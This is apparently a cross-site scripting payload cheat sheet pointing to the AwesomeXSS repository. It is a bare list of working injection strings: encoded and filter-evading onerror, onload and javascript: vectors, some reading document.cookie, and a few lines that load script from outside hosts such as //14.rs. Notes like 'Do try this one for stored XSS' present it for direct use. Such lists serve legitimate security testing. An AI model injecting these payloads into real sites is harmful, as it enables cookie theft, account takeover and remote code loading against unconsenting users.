Please do visit as well: https://github.com/s0md3v/AwesomeXSS

<img src=1 onerror=alert("XSS")>
"><img src=1 onerror=alert("XSS")>
"><img src=x onerror=alert(document.cookie)>
<img src=x onerror=alert(document.cookie)>
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
"`'><script>\x3Bjavascript:alert(1)</script>
</TITLE><SCRIPT>alert(document.domain);</SCRIPT> 
<<SCRIPT>alert("XSS");//\<</SCRIPT>
`[{\"displayName\":\"<img src=x onmouseover=prompt(document.domain)>\"}]`
</title><scRipt>alert(0x00C57D)</scRipt>
<iMg src%3dN onerror%3dalert(0x0036A9)>
<iMg src%3dN onerror%3dalert(0x000D98)>
`<img/src/onerror=prompt(document.domain)>`
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>     --> Do Try this if there is HTML Injection
<a href="javascript:alert(document.domain)">XSS</a>                                --> Do Try this if there is HTML Injection
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">XSS</a>             --> Do try this one for stored XSS
<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>
